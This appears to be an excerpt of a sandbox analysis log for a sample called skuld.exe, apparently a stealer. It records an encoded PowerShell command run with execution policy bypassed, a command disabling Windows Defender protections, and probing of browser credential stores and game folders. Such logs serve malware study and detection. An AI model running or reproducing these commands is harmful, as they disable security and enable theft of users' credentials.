                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiabt
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiabtJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversendJump to behavior
                        Source: skuld.exe, 00000000.00000002.2728804738.000000C00014E000.00000004.00001000.00020000.00000000.sdmp, skuld.exe, 00000000.00000003.1509958307.000000C000AFC000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Program Manager
                        Source: skuld.exe, 00000000.00000003.1509958307.000000C000AFC000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: BluetoothNotificationAreaIconWindowClassBluetoothNotificationAreaIconWindowClassbluetoothnotificationareaiconwindowclassDWM Notification WindowDWM Notification Windowdwm notification windowProgram ManagerProgram Managerprogram managerDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeMSCTFIME UIMSCTFIME UImsctfime uiDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeMSCTFIME UIMSCTFIME UImsctfime uiDefault IMEDefault IMEdefault imeMSCTFIME UIMSCTFIME UImsctfime uiDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault imeDefault IMEDefault IMEdefault ime
                        Source: skuld.exe, 00000000.00000002.2728804738.000000C00014E000.00000004.00001000.00020000.00000000.sdmp, skuld.exe, 00000000.00000003.1509958307.000000C000AFC000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: program manager
                        Source: skuld.exe, 00000000.00000002.2728804738.000000C00014E000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: DWM Notification WindowDWM Notification Windowdwm notification windowProgram ManagerProgram Managerprogram managerDefault IMEDefault IME
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\Default\Desktop VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\Default\Desktop VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\Default\Documents\My Music VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\Default\Documents\My Pictures VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\Default\Documents\My Videos VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\Default\Videos VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\Default\Pictures VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Temp\games-Default VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Temp\games-Default\Default VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Temp\games-Default\Default\Epic Games VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Temp\games-Default\Default\Minecraft VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\Default\OneDrive VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\Public\Desktop VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\Public\Downloads VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\Public\Documents VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\Public\Documents\My Music VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\Public\Documents\My Pictures VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\Public\Documents\My Videos VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\Public\Videos VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\Public\Pictures VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\Public\Music VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\Desktop\MXPXCVPDVN VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\Desktop\SQRKHNBNYN VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\Desktop\WUTJSCBCFX VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\Desktop\YPSIACHYXW VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\Documents VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\Documents\My Music VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\Documents\My Pictures VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\Documents\My Videos VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\Default\Downloads VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\Default\Documents VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\Default\Documents\My Music VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\Default\Documents\My Pictures VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\Default\Pictures VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\Default\Music VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\Default\OneDrive VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\Public\Desktop VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\Public\Downloads VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\Public\Documents\My Music VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\Public\Documents\My Pictures VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\Public\Documents\My Videos VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\Public\Pictures VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\Public\Music VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\Desktop VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\Desktop\RAYHIWGKDI VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\Desktop\SQRKHNBNYN VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\Desktop\WUTJSCBCFX VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\Desktop\YPSIACHYXW VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\Documents VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\Documents\MXPXCVPDVN VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\Documents\My Pictures VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\Documents\My Videos VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\Documents\RAYHIWGKDI VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\Documents\SQRKHNBNYN VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\Documents\YPSIACHYXW VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\Videos VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\Pictures VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\Music VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\Documents\YPSIACHYXW VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Temp\commonfiles-temp VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Temp\games-Public\Public\Minecraft VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: \Device\CdRom0\ VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\AutofillStates VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\CertificateRevocation VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Temp\games-user VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Temp\games-user\user VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crashpad VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Crowd Deny VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Temp\games-user\user\Minecraft VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\FirstPartySetsPreloaded VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\GrShaderCache VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\MEIPreload VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\MediaFoundationWidevineCdm VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Crashpad VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\EADPData Component VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Fre VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Edge Wallet VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Safe Browsing VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ShaderCache VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Speech Recognition VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Web Notifications Deny List VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\WidevineCdm VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\ZxcvbnData VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\bookmarkbackups VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\crashes VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\crashes\events VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\datareporting VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Local\Temp\browsers-temp VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\datareporting\archived VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\datareporting\archived\2023-10 VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\skuld.exeQueries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\wuifzt30.default-release\datareporting\glean\tmp VolumeInformationJump to behavior
